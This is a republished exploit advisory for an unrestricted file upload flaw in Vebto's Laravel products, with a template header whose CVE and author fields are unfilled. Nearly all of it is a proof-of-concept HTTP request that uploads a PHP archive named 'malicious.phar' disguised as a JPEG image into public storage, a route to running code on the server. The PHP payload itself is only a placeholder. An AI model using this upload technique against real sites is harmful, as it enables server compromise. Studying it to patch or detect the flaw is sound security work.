LARAVEL VEBTO MULTIPLE FILE UPLOAD

CVE	Category	Price	Severity
CVE-XXXX-XXXX	CWE-XX	$XXX	High/Low/Medium/Critical

Author	Risk	Exploitation Type	Date
Author Name	Critical/High/Medium/Low	Remote/Local	2023-03-19

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023030045

Below is a copy:

LARAVEL VEBTO MULTIPLE FILE UPLOAD

# Exploit Title: LARAVEL VEBTO MULTIPLE FILE UPLOAD
# Description: THE ALL PRODUCT FROM VEBTO IS VULNERABLE TO UPLOAD THE MALICIOUS FILE
# Date: 20210503
# Exploit Author: Khunerable
# Vendor Homepage: https://codecanyon.net/user/vebto/portfolio
# Tested on: Windows 11,Windows NT 10.0

POC :
===================================
register the user, go to edit profile and follow the step
===================================

POST /secure/uploads/images HTTP/2
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Origin: localhost
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

-----------------------------338660485121055751091161261824
Content-Disposition: form-data; name="diskPrefix"

/
-----------------------------338660485121055751091161261824
Content-Disposition: form-data; name="file"; filename="malicious.phar"
Content-Type: image/jpeg

<?php malicious();?>
-----------------------------338660485121055751091161261824


===================================

then the file will uploaded localhost/storage/malicious.phar

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum